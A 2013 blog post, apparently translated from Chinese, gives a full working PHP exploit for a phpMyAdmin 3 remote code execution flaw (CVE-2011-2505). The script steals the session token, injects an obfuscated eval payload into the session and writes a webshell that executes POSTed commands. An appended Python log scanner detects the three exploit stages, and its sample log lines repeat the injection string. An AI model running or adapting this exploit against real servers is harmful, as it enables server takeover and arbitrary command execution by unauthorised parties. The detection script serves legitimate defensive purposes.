phpMyAdmin3 remote code execute exploit, PHP version

Posted on 2013-2-21 09:13:03
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months now, and my blog has not been updated either.

Last night I was up all night with the baby and saw 黑哥 discussing the phpMyAdmin3 vulnerability in the php security group. I had not read the vulnerable code before, though a while ago I did see wofeiwo's exp on Weibo. According to 黑哥, there is a way to exploit it that is not jilei (a "chicken rib", i.e. not worth much), so that night I dug the code out, studied it, and wrote this reheated exp. Since I got to it late and many people had already studied it and written exps, mine is just reheated leftovers; take it as some research to pass the time.

First, props to wofeiwo's Python version of the exp, and props again to wofeiwo's and superhei's spirit of digging in; they are role models to learn from. But that earlier exp has some limitations when you try to use it:
First, session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already locked down with .htaccess and cannot be accessed.
And of course there is a third point, a gulf none of us can cross: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and then looking at the code again, I found that the first two restrictions can both be ignored. So this vulnerability really is not so jilei after all.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists.
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
$resp=array();
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=isset($resp[3])?$resp[3]:'';
$sessionid=isset($resp[1])?$resp[1]:'';
if($token && $sessionid){
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

/**
 * Minimal raw HTTP/1.1 client over a socket: GET when $data is empty, POST otherwise.
 **/
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // read until the server closes the connection (Connection: Close)
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    fclose($fp);
    return $resp;
}

?>
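A defender-side check, added here and not part of oldjun's post: the exploit above leaves a recognisable three-step trail in the web server access log (a request carrying session_to_unset together with a _SESSION[...] key in the query string, a POST to setup/config.php, and then a served .php file under config/, a directory that should not be reachable on a deployed phpMyAdmin). This Python script scans Apache combined-format log lines for that chain per client IP; the log lines, IPs and token values are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not real traffic). Lines 2-4
# mirror the three requests the exploit in the post sends; the last line is
# ordinary use from a different client.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/index.php HTTP/1.1" 200 5123
203.0.113.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/db_create.php?token=0123456789abcdef&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102));/*][host]=x HTTP/1.1" 200 312
203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 77
203.0.113.5 - - [21/Feb/2013:09:13:06 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5
198.51.100.9 - - [21/Feb/2013:10:00:00 +0800] "GET /pma/index.php HTTP/1.1" 200 5123
"""

# captures: client ip, method, request target, status code
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (ip, stage) for a line matching one exploit stage, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    path, _, query = target.partition('?')
    query = unquote(query)          # also catch %5B-encoded brackets
    # stage 1: session_to_unset combined with a _SESSION[...] key in the query
    if 'session_to_unset=' in query and '_SESSION[' in query:
        return ip, 'session_injection'
    # stage 2: the setup script is asked to save a configuration file
    if method == 'POST' and path.endswith('/setup/config.php'):
        return ip, 'setup_save'
    # stage 3: a .php file under the config/ directory was actually served
    if status == '200' and re.search(r'/config/[^/]+\.php$', path):
        return ip, 'config_php_served'
    return None

def find_exploit_chains(log_text):
    """Map client IP -> stages seen, keeping IPs that injected and went further."""
    seen = {}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            seen.setdefault(hit[0], set()).add(hit[1])
    return {ip: s for ip, s in seen.items()
            if 'session_injection' in s and len(s) > 1}

if __name__ == '__main__':
    for ip, stages in find_exploit_chains(SAMPLE_LOG).items():
        print(f'[!] {ip}: {", ".join(sorted(stages))}')
```

A single session_injection hit on its own is already worth an alert; the chain view mainly helps rank which client to look at first.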